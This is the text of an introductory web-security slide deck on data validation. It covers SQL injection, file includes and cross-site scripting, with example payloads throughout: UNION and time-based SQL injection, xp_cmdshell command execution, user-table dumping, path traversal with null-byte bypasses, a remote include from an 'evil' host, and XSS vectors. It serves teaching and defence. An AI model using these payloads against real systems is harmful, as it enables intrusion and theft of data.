web application security 101 - 14 data validation

Data ValidationCommon input validation problems.

Types Of ProblemsSQL Injection

Local File Includes

Cross-site Scripting

SQL InjectionSQL Injection is an attack where a partial or a complete SQL query is

inserted/injected into another query run by the targeted application.

Types Of SQL InjectionVanilla - when errors are displayed.

Blind - when no errors are displayed.

SQL BackendsThere are multiple SQL backends that have various features.

Common BackendsMsSQL (Transact-SQL)

MySQL

PostgreSQL

Oracle (PL/SQL)

Many More

SQL Injection In PrincipleWorks by injecting SQL parts in already existing queries.

SELECT * FROM table WHERE column = 'injected by the user'

In DetailAssuming that $value is a variable controlled by the user:

$query = "SELECT * FROM table WHERE column = '" + $value + "'";

When $value equals to ' OR '1'='1 then:

SELECT * FROM table WHERE column = '' OR '1'='1'

SQL Injection TechniquesUnion Selection - to obtain values from other tables.

SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e'

Boolean Selection - to create universally true or false statements.

SELECT * FROM table WHERE column = '' OR '1'='1'

Time Selection - to measure injection by timing the execution.

SELECT * FROM table WHERE column = '' OR IF(1=1, sleep(10), 'false'))--'

MsSQL Injection TechniquesTable enumeration - find the table structure.

SELECT * FROM table WHERE column = '' HAVING 1=1--'

SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1--

Code execution - running arbitrary commands.

SELECT * FROM table WHERE column = ''; exec master.dbo.xp_cmdshell 'command

Query delay - timing delay after query.

SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'

MySQL Injection Techniques Pt. 1Finding information - retrieving various server variables and functions.

SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b',

User enumeration - retrieving MySQL server users and passwords.

SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'

MySQL Injection Techniques Pt. 2Table enumeration - retrieving MySQL server tables.

SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables#

Column enumeration - retrieving MySQL server columns.

SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns#

SQL Injection ToolsSqlninja

Sqlmap

SQL Injection Is ArtThere are many different types of tools and techniques with various

level of complexity used to exploit SQL Injection vulnerabilities.

File IncludesThis attack vector is used to perform arbitrary file/url read or

execution using low-level functions and application-specific features.

Types Of File IncludesLocal File Include - when the included file is local.

Remote File Include - when the included file is fetched remotely.

File Include In PrincipleWorks when user data reaches a function used to fetch a file.

<?php fetchfile("./path/to/file/injected by the user") ?>

In DetailAssuming that $value is a variable controlled by the user:

<?php fetchfile("./path/to/file/" . $value) ?>

When $value equals to ../../../index.php then:

<?php fetchfile("./path/to/file/../../../index.php") ?>

File Include Techniques Pt. 1Usage of ../ to traverse directory structure.

<?php fetchfile("./path/to/file/../../../index.php") ?>

Usage of null (0x00) to terminate strings for low level C functions.

<?php fetchfile("./path/to/file/../../../index.php\0.txt") ?>

File Include Techniques Pt. 2Usage of overlong dot (0xc0, 0xae) to by pass escape functions.

<?php fetchfile("./path/to/file/\xc0\xae./../../index.php\0.txt") ?>

Usage of system resources to cause other behaviour.

<?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>

Remote File IncludesThis type of problem occurs when injecting a remote file controlled

by the attacker. In this case, the attacker has a greater control over

the exploitation process if something special is done to the file.

<?php fetchfile("http://evil/path/to/file") ?>

FI Is ArtFile Include attacks are a popular mechanism for compromising web

applications.

Cross-site ScriptingIs a type of vulnerability where an attacker can bypass SOP (Same

Origin Policy) through client-side injection or by abusing forms of

configuration.

Types Of XSSReflected - when the injection is immediately returned.

Stored - when the injection is stored.

DOM-based - when the injection occurs due to JS.

Others - the are many other uncategorized varients.

XSS In PrincipleWorks by injecting fragments of HTML/JS inside the web page.

<span>injected by the user</span>

In DetailAssuming that $value is a variable controlled by the user:

<?php ?><span><?php echo $value ?></span>

When $value equals to <script>alert(1)</script> then:

<span><script>alert(1)</script></span>

XSS Techniques Pt. 1When script tags are sanitized or escaped.

<span><img src=a onerror=alert(1)></span>

When the injection occurs inside an event attribute.

<button onclick="alert(1)"></button>

XSS Techniques Pt. 2When the injection occurs inside JavaScript a tag.

<script>var a = ""; alert(1); "";</script>

When the injection occurs in multiple small places.

<span><script>alert(1)/* is something like */</script></span>

Stored XSSThe injection is temporarily or permanently stored.

<?php $_SESSION['name'] = $_GET['name'] ?>

Later on there is this code that causes for the XSS to occur:

<?php ?><span><?php echo $_SESSION['name'] ?></span>

DOM-based XSSThe injection may occur at any point but triggered via JavaScript.

<script>var match = document.location.search.match(/[?&]name=(\w+)/);

if (match) { document.write("Hello " + match[1]);}</script>

There are many different ways an injection can occur.

Other Forms Of XSSThe presence of crossdomain.xml may open the app to XSS.

<?xml version="1.0" encoding="UTF-8" ?><cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>

XSS Is ArtCross-site scripting is very popular and widely spread vulnerability.

Other Input Validations FlawsMemory Corruption

Command Injection

LDAP Injection

XML Injection

XPATH Injection

SSI Injection

Remote File Inclusion

Many, Many More

LabWe will be finding data validation problems.